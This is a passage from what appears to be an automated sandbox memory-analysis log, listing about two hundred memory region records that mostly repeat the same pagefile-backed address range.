"pagefile_0x0000000002880000" filename = "" Region: id = 6682 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6683 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6684 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6685 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6686 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6687 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6688 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6689 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6690 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6691 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6692 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6693 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6694 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6695 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6696 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6697 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6698 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6699 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6700 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6701 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6702 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6703 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6704 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 6705 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 6706 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6707 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6708 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6709 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6710 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6711 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6712 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6713 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6714 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6715 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6716 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6717 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6718 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6719 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6720 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6721 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6722 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6723 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6724 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6725 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6726 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6727 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6728 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6729 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6730 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6731 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6732 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6733 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6734 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6735 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6736 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6737 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6738 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6739 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6740 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6741 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6742 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6743 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6744 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6745 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6746 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6747 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6748 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6749 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6750 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6751 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6752 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6753 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6754 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6755 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6756 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6757 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6758 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6759 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6760 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6761 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6762 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6763 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6764 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6765 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6766 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6767 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6768 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6769 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6770 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6771 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6772 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6773 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6774 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6775 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6776 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6777 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6778 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6779 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6780 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6781 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6782 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6783 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6784 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6785 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6786 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6787 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6788 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6789 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6790 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6791 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6792 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6793 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6794 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6795 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6796 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6797 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6798 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6799 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6800 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6801 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6802 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6803 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6804 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6805 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6806 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6807 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6808 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6809 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6810 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6811 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6812 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6813 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6814 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 6815 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 6816 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6817 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6818 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6819 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6820 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6821 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6822 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6823 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6824 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6825 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6826 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6827 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6828 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6829 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6830 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6831 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6832 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6833 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6834 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6835 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6836 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6837 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6838 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6839 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6840 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6841 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6842 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6843 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6844 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6845 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6846 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6847 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6848 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6849 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6850 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6851 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6852 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6853 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6854 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6855 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6856 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6857 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6858 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6859 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6860 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6861 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6862 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6863 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6864 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6865 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6866 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6867 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6868 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 6869 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 